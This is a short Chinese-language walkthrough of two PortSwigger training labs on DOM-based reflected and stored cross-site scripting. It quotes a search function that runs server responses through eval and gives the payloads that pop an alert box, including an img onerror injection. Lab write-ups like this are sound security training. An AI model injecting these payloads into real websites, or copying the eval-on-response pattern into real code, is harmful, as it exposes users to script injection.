portswigger靶场-Lab12、13

（Lab 12）DOM反射xss（search函数中的eval执行json中的js）

（Lab 13）DOM存储xss（search函数中的eval执行json中的js）

靶场地址：https://portswigger.net/web-security

实验12：反射DOM xss

1.靶场解析

（js代码解析如下：

function search(path) {

    var xhr = new XMLHttpRequest();

    xhr.onreadystatechange = function() {

        if (this.readyState == 4 && this.status == 200) {

            eval('var searchResultsObj = ' + this.responseText);

            displaySearchResults(searchResultsObj);

        }

    };

这段代码是一个JavaScript函数，名为`search`。它使用XMLHttpRequest对象来异步请求数据，然后在接收到响应后执行特定的操作。

）

输入payload 12313123时：

=>

输入payload "-alert(1)}//时弹窗：

实验13：存储DOM xss

1.靶场解析

（js代码解析如下：

function search(path) {

    var xhr = new XMLHttpRequest();

    xhr.onreadystatechange = function() {

        if (this.readyState == 4 && this.status == 200) {

            eval('var searchResultsObj = ' + this.responseText);

            displaySearchResults(searchResultsObj);

        }

    };

这段代码是一个JavaScript函数，名为`search`。它使用XMLHttpRequest对象来异步请求数据，然后在接收到响应后执行特定的操作。

）

输入payload 11111时：

=>

输入payload <><img src=1 onerror=alert(1)>时弹窗：

原文始发于微信公众号（鲲哥的Bypass之旅）：portswigger靶场-Lab12、13